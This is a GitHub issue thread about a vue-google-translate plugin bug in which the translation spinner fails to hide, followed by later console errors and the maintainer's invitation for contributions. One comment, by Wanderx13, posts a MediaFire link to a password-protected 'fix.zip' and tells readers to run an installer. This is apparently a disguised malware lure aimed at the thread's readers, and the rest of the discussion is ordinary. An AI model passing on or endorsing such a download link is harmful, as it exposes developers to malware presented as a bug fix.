### ISSUE TITLE
Default google translate logo bug. not hiding

### ISSUE THREAD

**Issue by xyruux** [lewis-kori/vue-google-translate#10]
-> Normal scenario
After changing the language, the spinner of google translate in the right shows up and once the translation is complete it will be gone. 

-> Bug in
When there is an hidden field with labels and it shows it will translate too and shows again the spinner in the right. but sometimes it will not hide it self even if already done translation.  

-> Effects 
My clients online always reload the page due to this issue, it irritate them always spinning in the right. 
BTW - (no errors encountered in the console), also if I Use css or any ways to hide it. it CAN'T be hidden. 

## Environment
Vuejs vuetify, frontend (vue2 or vue3 same issue)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by booluw** [comment]
I don't think this is currently being maintained, and does this really work in translating a page? So, we could work on a port for Vue3.

**Comment by lewis-kori** [comment]
> I don't think this is currently being maintained, and does this really work in translating a page? So, we could work on a port for Vue3.

Hi @booluw Maintainer here. It works, but I cannot work on this due to a hectic schedule. Open-source contributions are open at this point.
will review the PRs and merge.

**Comment by xyruux** [comment]
> I don't think this is currently being maintained, and does this really work in translating a page? So, we could work on a port for Vue3.

yes it works good but not that excelent. some language such as chinese or korean or rusians etc have some issues in console. always flag me an errors. but for the performance not affecting.

**Comment by xyruux** [comment]
> > I don't think this is currently being maintained, and does this really work in translating a page? So, we could work on a port for Vue3.
> 
> Hi @booluw Maintainer here. It works, but I cannot work on this due to a hectic schedule. Open-source contributions are open at this point. will review the PRs and merge.

hi lewis. i love to use this. 
btw i mix this plugin with flags library. now my dropdown langue list are more good looking.

**Comment by lewis-kori** [comment]
@xyruux I'm happy you've found it useful and found creative ways to use the library.
I haven't touched vue.js in years If I'm being honest but I would still love to see this library modernised in one way or another.

Please feel free to fork it, update it or even contribute to it.

**Comment by xyruux** [comment]
Hi @lewis-kori, I having some new issue regarding the translations if im using VPN to check the site in other country. 

Im using laravel 
I include the script in the blade. 
then my front end is vue calling the library codes.. 
since verification is encountering the library still not imported but the site load first (and the code) due to this. error will show google is undefined... 

<img width="1089" alt="image" src="https://github.com/user-attachments/assets/967cadd0-a23f-4792-8127-6715ee25800a">


hoping for response and remedy soon.

**Comment by xyruux** [comment]
@lewis-kori 

Cookie “googtrans” has been rejected for invalid domain. 
it seems last year May 2025 google change the source. yet still working but having this issue in the console.
